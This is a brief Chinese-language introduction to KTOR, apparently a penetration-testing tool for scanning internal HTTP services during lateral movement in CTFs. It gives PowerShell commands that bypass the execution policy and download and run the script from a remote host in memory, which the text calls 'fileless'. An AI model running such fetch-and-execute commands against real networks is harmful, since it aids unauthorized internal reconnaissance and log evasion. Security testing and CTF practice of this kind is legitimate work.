KTOR for windows:無文件落地HTTP服务扫描工具
地址:https://github.com/MartinxMax/KTOR
介紹
KTOR 是一款專為 Linux 橫向滲透設計的工具。透過該工具,您可以快速掃描內部 HTTP 服務,以便進一步進行網路滲透,並實現無檔案落地(fileless)掃描。
在 CTF 中,通常需要利用本機其他埠口的 HTTP 服務或其他主機上的 HTTP 服務來橫向移動並提升權限。
當取得目標機器的低權限後,通常會對內部網路進行進一步的探測;然而透過埠口轉發再進行掃描會相當耗時。為了解決這個問題,KTOR 可用來預先探測存在 HTTP 服務的主機,有效減少日誌產生。
KTOR for Windows
PS> Set-ExecutionPolicy Bypass -Scope Process -Force;.\ktor.ps1
掃描當前主機HTTP服務
PS> iex "& { $(iwr http://192.168.0.106/ktor.ps1 -UseBasicParsing) } -Local"
掃描其他主機HTTP服務
PS> iex "& { $(iwr http://192.168.0.106/ktor.ps1 -UseBasicParsing) } -Targets 192.168.0.106 -Ports 80,8080,8000"
